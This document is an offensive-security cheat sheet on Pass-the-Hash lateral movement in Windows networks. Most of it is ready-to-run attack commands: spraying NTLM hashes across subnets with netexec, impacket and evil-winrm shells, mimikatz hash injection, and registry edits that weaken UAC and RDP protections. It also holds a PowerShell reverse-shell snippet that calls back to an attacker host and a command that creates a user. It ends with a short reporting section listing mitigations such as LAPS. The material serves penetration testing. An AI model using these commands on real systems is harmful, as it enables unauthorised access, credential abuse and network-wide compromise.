🛡️ Methodology Checklist
- Obtain NTLM hash (SAM, LSASS, NTDS dump)
- NXC spray across subnet: nxc smb [SUBNET]/24 -u [USER] -H [HASH] --local-auth
- Look for (Pwn3d!) indicating local admin
- Shell via Impacket: impacket-psexec [DOMAIN]/[USER]@[TARGET] -hashes :[HASH]
- WinRM: evil-winrm -i [TARGET] -u [USER] -H [HASH]
- If PtH blocked: check whether SMB signing is enforced on target
- Spray hash against domain accounts to find reuse
🎯 Operational Context
Use when: NTLM hash obtained — authenticate to Windows services (SMB, WinRM, RDP with NLA disabled) without cracking the plaintext password.
Think Dumber First: nxc smb [SUBNET]/24 -u Administrator -H [NTLM_HASH] --local-auth — sweeps entire subnet with the hash. Anything that shows Pwn3d! is accessible. Then nxc smb [TARGET] -u Administrator -H [HASH] -x 'whoami' for command execution.
Skip when: Target enforces Kerberos-only — NTLM disabled, PtH fails; use PtT instead.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| impacket-psexec [USER]@[TARGET_IP] -hashes :[NT_HASH] | PsExec shell via hash (requires ADMIN$ write) |
| impacket-smbexec [USER]@[TARGET_IP] -hashes :[NT_HASH] | SMBExec shell via hash |
| impacket-wmiexec [USER]@[TARGET_IP] -hashes :[NT_HASH] | WMIExec shell via hash (stealthier, no service created) |
| netexec smb [SUBNET]/24 -u [USER] -d . -H [NT_HASH] | Spray hash across subnet, find Pwn3d! hosts |
| netexec smb [TARGET_IP] -u [USER] -d . -H [NT_HASH] -x whoami | Execute command via hash |
| evil-winrm -i [TARGET_IP] -u [USER] -H [NT_HASH] | WinRM shell via hash |
| xfreerdp /v:[TARGET_IP] /u:[USER] /pth:[NT_HASH] | RDP via hash (requires RestrictedAdmin mode) |
| reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f | Enable RestrictedAdmin mode for RDP PtH |
| mimikatz.exe "privilege::debug" "sekurlsa::pth /user:[USER] /rc4:[NT_HASH] /domain:[DOMAIN] /run:cmd.exe" exit | PtH from Windows — spawn process as victim user |
| Invoke-SMBExec -Target [TARGET_IP] -Domain [DOMAIN] -Username [USER] -Hash [NT_HASH] -Command "net user mark Pass /add" | PowerShell SMB exec using hash (Invoke-TheHash) |
| Invoke-WMIExec -Target [TARGET_IP] -Domain [DOMAIN] -Username [USER] -Hash [NT_HASH] -Command "powershell -enc [BASE64]" | WMI exec via hash — stealthier than SMB |
🔬 Deep Dive & Workflow
How PtH Works
NTLM authentication uses the hash directly as the proof of identity — the protocol never requires the plaintext password to be derived. Capturing a valid NT hash is sufficient to authenticate as that user against any NTLM-speaking service.
Requirements:
- Valid NT hash (RC4)
- Target service accessible via SMB (445) or WinRM (5985/5986)
- For most methods: administrative privileges on target
Tool Selection Matrix
| Scenario | Tool | Notes |
|---|---|---|
| Quick shell from Linux | impacket-psexec | Requires ADMIN$ write access |
| Stealthy exec from Linux | impacket-wmiexec | No service created, quieter |
| Subnet discovery | netexec smb | Look for (Pwn3d!) in output |
| WinRM access | evil-winrm -H | Also works for non-admin if in “Remote Management Users” |
| RDP access | xfreerdp /pth: | Needs RestrictedAdmin enabled |
| From Windows | mimikatz sekurlsa::pth | Spawns process in victim’s context |
| Remote exec from Windows | Invoke-TheHash | Supports WMI (stealthier) and SMB |
UAC Restriction on Local Accounts
| Account Type | PtH Works? |
|---|---|
| Domain accounts | Yes, always |
| Built-in Administrator (RID 500) | Yes, always |
| Other local admins | No, unless LocalAccountTokenFilterPolicy = 1 |
Fix for local admin PtH:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Reverse Shell via Invoke-TheHash (Correct Encoding)
Online payload generators often produce wrongly encoded Base64. Generate UTF-16LE locally:
```powershell
# Payload string (elided here); -EncodedCommand expects UTF-16LE, which .NET calls "Unicode"
$cmd = '$c=New-Object System.Net.Sockets.TcpClient("[LHOST]",4444);$s=$c.GetStream();...'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
Write-Host "powershell -EncodedCommand $encoded"
```
Then use that output as the -Command parameter.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PtH returns STATUS_LOGON_FAILURE | Hash invalid or account restricted | Verify hash format: LM:NTLM (32 chars each); check if account is disabled or locked |
| nxc PtH works but psexec fails | Writable ADMIN$ share required | psexec needs ADMIN$ writable; try nxc smb [TARGET] -H [HASH] -x cmd |
| PtH fails on domain account | Restricted Admin mode | Enable: reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 |
| evil-winrm PtH fails | WinRM not enabled | Check: nxc winrm [TARGET] -u [USER] -H [HASH]; WinRM must be running on target |
| RDP PtH fails | NLA blocks hash auth | Disable NLA or use nxc rdp [TARGET] -u [USER] -H [HASH] --rdp-timeout 10 — PtH with RDP requires NLA disabled |
📝 Reporting Trigger
Finding Title: Pass-the-Hash Lateral Movement Across Multiple Systems
Impact: NTLM hash reuse allows authenticating to all systems sharing the same local administrator password hash without cracking, enabling rapid lateral movement across the entire network segment if LAPS is not deployed.
Root Cause: Local administrator password reuse without LAPS. NTLM authentication accepted by target systems without additional controls.
Recommendation: Deploy LAPS immediately to randomize local admin passwords. Enable Credential Guard to prevent NTLM hash extraction. Consider disabling NTLM entirely and enforcing Kerberos. Alert on lateral movement patterns via Microsoft Defender for Identity.